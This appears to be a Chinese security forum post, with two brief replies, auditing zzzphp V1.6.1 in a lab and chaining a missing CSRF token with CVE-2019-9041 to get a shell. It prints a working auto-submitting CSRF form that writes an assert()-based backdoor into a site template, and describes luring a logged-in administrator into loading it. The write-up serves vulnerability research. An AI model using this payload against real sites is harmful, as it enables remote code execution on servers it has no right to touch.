请选择 进入手机版 | 继续访问电脑版
查看: 665|回复: 2

CVE-2019-9041 CSRF到Getshell漏洞

[复制链接]
  • TA的每日心情
    奋斗
    前天 22:41
  • 签到天数: 6 天

    [LV.2]偶尔看看I

    发表于 2019-7-9 01:37:06 | 显示全部楼层 |阅读模式
    本帖最后由 90_ 于 2019-7-10 10:34 编辑

    前言
    无意中看到vulnhub新放了一个Csrf大礼包,集合多个最新的csrf to getshell的cve!所以拿这个系统做一个系列关于Csrf的代码审计之路!今天的cms是zzzphp,漏洞并不是特别复杂,算是开个头吧!
    正文
    审计的zzzphp系统版本为V1.6.1,首先是一个csrf漏洞,这个漏洞原因在于整个后台没有csrf token保护,导致存在csrf漏洞,所以可以伪造客户端请求!再配合CVE-2019-9041即可getshell!
    首先我们使用Burp Suite生成一个CSRF POC
    修改如下:
    [HTML] 纯文本查看 复制代码
    <html>  <!-- [color=rgb(0, 136, 204)][backcolor=transparent]CSRF[/backcolor][/color] PoC - generated by Burp Suite Professional -->  <body>  <script>history.pushState('', '', '/')</script>​    <form action="http://192.168.1.64/zzzphp/admin015/save.php?act=editfile" method="POST">​      <input type="hidden" name="file" value="/zzzphp/template/pc/cn2016/html/search.html" />​      <input type="hidden" name="filetext" value="{if:assert($_;POST[x])}phpinfo();{end if}" />​      <input type="submit" value="Submit request" />​    </form>​    <script>​      document.forms[0].submit();​    </script>​  </body>​</html>
    其中生效的payload为html编码的{if:assert($_POST[x])}phpinfo();{end if}。我们把这个poc保存为html文件,在管理员登陆的状态下,诱导管理员点击包含poc的链接,即可在search.html模版中插入恶意代码!
    利用过程
    csrf诱导点击链接
    管理员点击后操作为后台的模版管理 -> 电脑模版 -> cn2016(6) -> html -> search.html 编辑
    在模版中添加{if:assert($_POST[x])}xxx;{end if} 保存
    代码执行

    本帖子中包含更多资源

    您需要 登录 才可以下载或查看,没有帐号?注册

    x
    回复

    使用道具 举报

  • TA的每日心情
    奋斗
    前天 22:41
  • 签到天数: 6 天

    [LV.2]偶尔看看I

     楼主 发表于 2019-7-9 01:37:34 | 显示全部楼层
    怎么还有变成表情操作///

    点评

    90_
    学会用代码编辑器  详情 回复 发表于 2019-7-10 10:35
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    擦汗
    1 小时前
  • 签到天数: 727 天

    [LV.9]以坛为家II

    发表于 2019-7-10 10:35:23 | 显示全部楼层

    RE: CVE-2019-9041 CSRF到Getshell漏洞

    danko 发表于 2019-7-9 01:37
    怎么还有变成表情操作///

    学会用代码编辑器
    回复 支持 反对

    使用道具 举报

    您需要登录后才可以回帖 登录 | 注册

    本版积分规则

    快速回复 返回顶部 返回列表